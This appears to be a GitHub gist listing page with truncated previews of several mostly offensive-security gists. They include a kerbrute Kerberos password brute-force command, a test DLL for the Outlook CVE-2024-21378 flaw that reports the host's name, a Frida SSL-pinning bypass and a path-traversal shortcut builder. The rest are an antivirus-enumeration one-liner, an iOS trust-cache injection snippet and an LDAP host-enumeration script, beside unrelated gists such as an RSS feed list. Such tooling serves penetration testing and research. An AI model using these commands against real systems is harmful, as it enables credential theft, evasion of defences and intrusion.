With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
P4l1ndr0m
grahamhelton
/ gist:d8f9f14789ad9020ae61ece81446e348
Last active
March 11, 2026 07:58
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?> | |
| <opml version="1.0"> | |
| <head> | |
| <title>RSS</title> | |
| <dateCreated>Sat, 19 Jul 2025 23:58:29 +0000</dateCreated> | |
| <ownerEmail>nope</ownerEmail> | |
| </head> | |
| <body> | |
| <outline text="citadel" title="citadel"> | |
| <outline text="gynvael.coldwind//vx.log (pl)" title="gynvael.coldwind//vx.log (pl)" type="rss" xmlUrl="http://feeds.feedburner.com/GynvaelColdwindPL" htmlUrl="https://gynvael.coldwind.pl/"/> |
Homer28
/ test_dll.c
Last active
June 29, 2025 09:52
DLL code for testing CVE-2024-21378 in MS Outlook
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * This DLL is designed for use in conjunction with the Ruler tool for | |
| * security testing related to the CVE-2024-21378 vulnerability, | |
| * specifically targeting MS Outlook. | |
| * | |
| * It can be used with the following command line syntax: | |
| * ruler [auth-params] form add-com [attack-params] --dll ./test.dll | |
| * Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch). | |
| * | |
| * After being loaded into MS Outlook, it sends the PC's hostname and |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| The script requires Python3 and the packages `numpy`, `pandas` and `matplotlib`. | |
| It accepts a input file compatible with Mermaid (cf `bb.data`) and generates a PNG file. | |
| The tag `<br/>` is supported, so that a label can be displayed on several lines. | |
| I use the font `Humor Sans`, that can be installed via `apt install fonts-humor-sans`. |
Brandon7CC
/ es_coreanalytics_event_subs.js
Last active
May 6, 2025 19:55
Hook the CoreAnalytics sendEvent function call made by endpointsecurityd to uncover event subscriptions.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Author: Brandon Dalton (Red Canary Threat Research) | |
| Date: 2023-12-07 | |
| Summary: This script attempts to instrument the `sendEvent:event:` method of the ESCoreAnalytics class. | |
| - Download this script | |
| - Target: You're targeting `endpointsecurityd`, so grab its PID: `sudo launchctl list | grep endpointsecurityd` | |
| - To run: `sudo frida -p $PID -l es_coreanalytics_event_subs.js` | |
| */ | |
| const eventTypeMapping = { |
incogbyte
/ mixunpin.js
Last active
April 6, 2026 16:51
Frida script to bypass common methods of sslpining Android
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| console.log("[*] SSL Pinning Bypasses"); | |
| console.log(`[*] Your frida version: ${Frida.version}`); | |
| console.log(`[*] Your script runtime: ${Script.runtime}`); | |
| /** | |
| * by incogbyte | |
| * Common functions | |
| * thx apkunpacker, NVISOsecurity, TheDauntless | |
| * Remember that sslpinning can be custom, and sometimes u need to reversing using ghidra,IDA or something like that. | |
| * !!! THIS SCRIPT IS NOT A SILVER BULLET !! |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| param ( [string]$SourceExe, [string]$DestinationPath, [string]$IconPath) | |
| $WshShell = New-Object -comObject WScript.Shell | |
| $Shortcut = $WshShell.CreateShortcut($DestinationPath) | |
| $Shortcut.RelativePath = "..\..\..\..\..\..\..\..\..\$SourceExe" | |
| $Shortcut.IconLocation = $IconPath | |
| $Shortcut.TargetPath = $SourceExe | |
| $Shortcut.Save() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #AntiVirus Query | |
| #Author: @r3dQu1nn | |
| #Queries the Registry for AV installed | |
| #Thanks to @i_am_excite and @merrillmatt011 for the help | |
| #Props to @zerosum0x0 for the wmic find! | |
| #Long ass one-liner :) | |
| $powershellcmd = "\$av_list = @(\"BitDefender\", \"Kaspersky\", \"McAfee\", \"Norton\", \"Avast\", \"WebRoot\", \"AVG\", \"ESET\", \"Malware\", \"Windows Defender\");\$av_install = Get-ItemProperty HKLM:\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\*;\$av_install1 = Get-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\*;\$regkey = 'HKLM:\\SOFTWARE\\Microsoft\\Windows Defender\\Signature Updates\\';\$av_loop2 = foreach (\$av1 in \$av_list){foreach (\$key in \$av_install){if (\$key.DisplayName -match \$av1 -eq \$TRUE){% {\"{0}|{1}|{2}\" -f \$key.DisplayName.ToString(), \$key.DisplayVersion.ToString(), \$key.InstallDate.ToString()}}}};\$proc_temp = Get-Process;\$av_loop = foreach (\$av in \$av_list){foreach (\$zz in \$proc_temp){if (\$zz.path -match \$av -eq \$TRUE) |
TarlogicSecurity
/ kerberos_attacks_cheatsheet.md
Created
May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks
Proteas
/ inject_trusts-iOS-v12.1.2-16C104-iPhone11,x.c
Last active
October 22, 2023 11:31
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| void inject_trusts(int pathc, const char *paths[]) | |
| { | |
| printf("[+] injecting into trust cache...\n"); | |
| extern uint64_t g_kern_base; | |
| static uint64_t tc = 0; | |
| if (tc == 0) { | |
| /* loaded_trust_caches | |
| iPhone11,2-4-6: 0xFFFFFFF008F702C8 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import argparse | |
| import sys | |
| import binascii | |
| import socket | |
| import re | |
| from ldap3 import Server, Connection, NTLM, ALL, SUBTREE, ALL_ATTRIBUTES | |
| # get /etc/hosts entries for domain-joined computers from A and AAAA records (via LDAP/ADIDNS) (@3xocyte) |
NewerOlder